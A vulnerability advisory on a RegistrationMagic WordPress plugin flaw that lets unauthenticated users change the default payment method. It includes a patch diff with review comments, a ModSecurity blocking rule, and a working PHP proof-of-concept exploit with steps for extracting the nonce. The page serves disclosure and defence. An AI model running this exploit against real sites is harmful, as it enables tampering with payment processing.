Atomic Edge analysis of CVE-2026-32498:
The RegistrationMagic WordPress plugin contains a missing authorization vulnerability in versions up to and including 6.0.7.6. This vulnerability allows unauthenticated attackers to change the site’s default payment method via an AJAX endpoint. The CVSS score of 5.3 reflects a medium severity impact.
Atomic Edge research identified the root cause in the `rm_options_default_payment_method` function within the `class_registration_magic.php` file. The function at line 1220 only verified the AJAX nonce via `check_ajax_referer('rm_ajax_secure','rm_sec_nonce')` but lacked any capability check. This allowed any request with a valid nonce to proceed, regardless of the user’s authentication status or permissions. A WordPress nonce is an anti-CSRF token, not an authorization control, so the nonce verification alone provided insufficient protection for administrative actions.
Exploitation requires sending a POST request to the WordPress admin-ajax.php endpoint with the action parameter set to `rm_options_default_payment_method`. The attacker must include a valid `rm_sec_nonce` value, which can be obtained from the frontend of any site using the plugin, and the `payment_method` parameter containing the new payment method value. Attackers can use this to disrupt payment processing or force specific payment gateways.
The patch adds a capability check to the existing nonce verification. The updated condition at line 1220 now requires `(current_user_can('manage_options') || current_user_can('rm_options_managemanage_options'))`. This ensures only users with administrative privileges or specific RegistrationMagic management capabilities can execute the function. The plugin version was incremented to 6.0.7.7 in registration_magic.php.
Successful exploitation allows unauthenticated attackers to modify the site’s default payment method configuration. While this does not directly lead to data exposure or remote code execution, it can disrupt legitimate payment processing, potentially causing financial impact or service disruption. Attackers could force the use of specific payment gateways they control or disable payment functionality entirely.
Below is a differential between the unpatched vulnerable code and the patched update, for reference.
--- a/custom-registration-form-builder-with-submission-manager/includes/class_registration_magic.php
+++ b/custom-registration-form-builder-with-submission-manager/includes/class_registration_magic.php
@@ -1220,7 +1220,7 @@
}
}
public function rm_options_default_payment_method(){
- if(check_ajax_referer('rm_ajax_secure','rm_sec_nonce')) {
+ if(check_ajax_referer('rm_ajax_secure','rm_sec_nonce') && (current_user_can('manage_options') || current_user_can('rm_options_managemanage_options'))) {
if(!empty($_REQUEST['payment_method'])) {
update_option('rm_option_default_payment_method',sanitize_text_field($_REQUEST['payment_method']));
}
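Review bot: The second capability string in the new condition, `rm_options_managemanage_options`, reads like two names run together; if the plugin registers no capability with exactly that spelling, that branch is never true and only `manage_options` holders pass (fail-closed, but probably not what was intended), so confirm it against the capabilities the plugin actually adds. Separately, `check_ajax_referer()` with its default third argument ends the request on a bad nonce, so the `if` is effectively guarding on the capability alone, and when that check fails the function falls through to code outside the hunk; an explicit `wp_send_json_error(null, 403);` in an else branch would make the denial unambiguous. The stored value is only passed through `sanitize_text_field()`, so comparing it against the list of configured gateways before `update_option()` would be tighter. The body of `rm_options_default_payment_method` continues past the hunk.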
--- a/custom-registration-form-builder-with-submission-manager/includes/class_rm_email.php
+++ b/custom-registration-form-builder-with-submission-manager/includes/class_rm_email.php
@@ -133,11 +133,7 @@
*/
public function from($from, $name = '', $replyto = true) {
if (!empty($from)) {
- if (empty($name)) {
- $this->set_header('From', $from);
- } else {
- $this->set_header('From', sprintf('%s <%s>', $name, $from));
- }
+ $this->set_header('From', $from);
$this->from = $from;
$this->from_name = $name;
if($replyto) {
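Review bot: `$from` reaches `set_header('From', $from)` with only an `empty()` test visible in this hunk, so if it can carry form- or settings-supplied text, a value containing CR/LF would add header lines unless `set_header()` strips them, which is not visible here. Rejecting values that fail `is_email($from)` before the call would close that regardless of what `set_header()` does. After this change `$name` is still stored in `$this->from_name` but no longer appears in the header, so the docblock above (outside the hunk) may need to say where the display name is applied, if anywhere. The function body continues past the hunk.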
--- a/custom-registration-form-builder-with-submission-manager/public/class_rm_public.php
+++ b/custom-registration-form-builder-with-submission-manager/public/class_rm_public.php
@@ -334,9 +334,11 @@
RM_DBManager::add_form_published_pages($form_id, get_the_ID());
// Load new shortcode if form has rows
+ /*
if (!empty(RM_DBManager::get_rows_by_form_id($form_id))) {
return $this->rm_new_form_render($attribute);
}
+ */
$this->enqueue_styles();
$this->enqueue_scripts();
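Review bot: The early return into `rm_new_form_render()` is disabled by wrapping it in `/* … */` with no explanation, and the comment `// Load new shortcode if form has rows` above it now describes code that never runs. Either delete the block together with the stale comment, or replace them with a one-line reason such as `// Row-based renderer disabled in 6.0.7.7: <reason>`. The same comment-out pattern appears in the class_rm_services.php hunk. The enclosing method starts and ends outside this hunk.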
--- a/custom-registration-form-builder-with-submission-manager/registration_magic.php
+++ b/custom-registration-form-builder-with-submission-manager/registration_magic.php
@@ -15,7 +15,7 @@
* Plugin Name: RegistrationMagic
* Plugin URI: http://www.registrationmagic.com
* Description: A powerful system for customizing registration forms, setting up paid registrations, tracking submissions, managing users, assigning user roles, analyzing stats, and much more!!
- * Version: 6.0.7.6
+ * Version: 6.0.7.7
* Tags: registration, form, custom, analytics, simple, submissions
* Requires at least: 5.2.0
* Requires PHP: 7.2
@@ -78,7 +78,7 @@
*/
if(!defined('RM_PLUGIN_VERSION')) {
define('RM_PLUGIN_BASENAME', plugin_basename(__FILE__ ));
- define('RM_PLUGIN_VERSION', '6.0.7.6');
+ define('RM_PLUGIN_VERSION', '6.0.7.7');
define('RM_DB_VERSION', 5.9);
define('RM_SHOW_WHATSNEW_SPLASH', false); //Set it to 'false' to disable whatsnew screen.
//define FB SDK req flags. Flags should be combined using logical OR and should be checked using AND.
--- a/custom-registration-form-builder-with-submission-manager/services/class_rm_front_service.php
+++ b/custom-registration-form-builder-with-submission-manager/services/class_rm_front_service.php
@@ -166,7 +166,7 @@
if (is_user_logged_in()) {
$user = wp_get_current_user();
$user_email = isset($user->user_email) ? $user->user_email : null;
- } elseif (isset($_COOKIE['rm_autorized_email'])) {
+ } elseif (isset($_COOKIE['rm_autorized_email']) && $this->is_authorized()) {
$user_email = $_COOKIE['rm_autorized_email'];
}
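Review bot: The `rm_autorized_email` cookie is still copied into `$user_email` verbatim once `$this->is_authorized()` passes, and that method is not visible here, so the hunk does not show whether it ties the visitor to this particular address or only confirms that some verification took place. If it is the latter, the address is still client-controlled, and it would be safer to take the email from the server-side record that `is_authorized()` validates rather than from the cookie. At minimum the value should be normalised, `$user_email = sanitize_email(wp_unslash($_COOKIE['rm_autorized_email']));`. The enclosing function starts and ends outside the hunk.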
--- a/custom-registration-form-builder-with-submission-manager/services/class_rm_services.php
+++ b/custom-registration-form-builder-with-submission-manager/services/class_rm_services.php
@@ -2326,12 +2326,12 @@
}
}
- if($this->get_setting('auto_generated_password')!='yes'){
+ /* if($this->get_setting('auto_generated_password')!='yes'){
$user_pas_field = RM_DBManager::get_field_by_type($form_id, 'UserPassword');
if(empty($user_pas_field)){
$this->create_default_password_field($form_id, $has_rows);
}
- }
+ } */
}
public function remove_primary_fields($form_id){
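Review bot: With this block commented out, a form where `auto_generated_password` is not `'yes'` and no `UserPassword` field exists no longer gets a default password field, and nothing in the hunk shows what credential such a registration ends up with. If password fields are now added somewhere else, a comment at this spot should say where and the dead code should be deleted; if not, the block probably needs to stay active. `create_default_password_field()` may also be left without callers, which is worth checking. The enclosing method begins outside the hunk.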
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
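# Atomic Edge WAF Rule - CVE-2026-32498
# Virtual patch: deny calls to the RegistrationMagic default payment method AJAX action
# until the plugin is updated to 6.0.7.7.
# NOTE: the rule cannot tell an administrator from anyone else, so it also blocks
# legitimate use of this setting; remove it once the patched version is installed.
# REQUEST_FILENAME is matched instead of REQUEST_URI so that a query string or a
# sub-directory install does not defeat the path test, and ARGS is used instead of
# ARGS_POST because the handler reads its parameters from $_REQUEST.
# Each line of a multi-line SecRule needs a trailing backslash.
SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \
    "id:10032498,phase:2,deny,status:403,chain,msg:'CVE-2026-32498 - Unauthorized RegistrationMagic payment method change',severity:'CRITICAL',tag:'CVE-2026-32498',tag:'WordPress',tag:'Plugin',tag:'RegistrationMagic'"
    SecRule ARGS:action "@streq rm_options_default_payment_method" "chain"
        SecRule &ARGS:rm_sec_nonce "!@eq 0" "chain"
            SecRule &ARGS:payment_method "!@eq 0"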
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-32498 - RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login <= 6.0.7.6 - Missing Authorization
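<?php
/**
 * Proof of Concept for CVE-2026-32498 (RegistrationMagic <= 6.0.7.6, missing authorization).
 *
 * Sends a single POST to admin-ajax.php with the `rm_options_default_payment_method`
 * action and reports whether the response looks like a success. Use it on a site you
 * are authorized to test to confirm whether the capability check added in 6.0.7.7 is
 * in place.
 *
 * Requires a valid nonce from the target site (can be extracted from frontend HTML).
 *
 * NOTE(review): what the handler returns is not shown on this page, so the 'success'
 * substring match below is a heuristic. Confirm the outcome by reading the
 * `rm_option_default_payment_method` option on the tested site.
 */

$target_url = 'https://example.com/wp-admin/admin-ajax.php'; // CHANGE THIS
$nonce = 'VALID_NONCE_HERE'; // Extract from page source: search for 'rm_sec_nonce'
$new_payment_method = 'paypal'; // Payment method to set

// Request body: the AJAX action plus the two parameters the handler reads.
$post_data = [
    'action' => 'rm_options_default_payment_method',
    'rm_sec_nonce' => $nonce,
    'payment_method' => $new_payment_method,
];

$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $target_url,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => $post_data,
    CURLOPT_RETURNTRANSFER => true,
    // Certificate and host-name verification stay enabled: with them off, the
    // nonce and the response could be read or altered by anyone on the path.
    // For a lab host with a private CA, point CURLOPT_CAINFO at that CA instead.
    CURLOPT_SSL_VERIFYPEER => true,
    CURLOPT_SSL_VERIFYHOST => 2,
    // Bound the run time so an unreachable host does not hang the script.
    CURLOPT_CONNECTTIMEOUT => 10,
    CURLOPT_TIMEOUT => 30,
    // Headers a browser-issued AJAX call would carry.
    CURLOPT_HTTPHEADER => [
        'X-Requested-With: XMLHttpRequest',
        'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
    ],
]);

// Execute the request; curl_exec() returns false on transport failure.
$response = curl_exec($ch);
$transport_error = ($response === false) ? curl_error($ch) : '';
$http_code = (int) curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($response === false) {
    // Without this branch a failed transfer would be reported as "HTTP 0".
    echo "[-] FAILED: request error: {$transport_error}\n";
    exit(1);
}

// Analyze response
if ($http_code === 200 && strpos($response, 'success') !== false) {
    echo "[+] SUCCESS: Default payment method changed to '{$new_payment_method}'\n";
    echo "Response: {$response}\n";
} else {
    echo "[-] FAILED: HTTP {$http_code}\n";
    echo "Response: {$response}\n";
}

// Helper: How to extract nonce from target site
/*
1. Visit any page with RegistrationMagic forms
2. View page source (Ctrl+U)
3. Search for 'rm_sec_nonce' or 'rm_ajax_secure'
4. Extract the nonce value from the JavaScript variable
Example: var rm_ajax = {nonce: 'a1b2c3d4e5'};
*/
?>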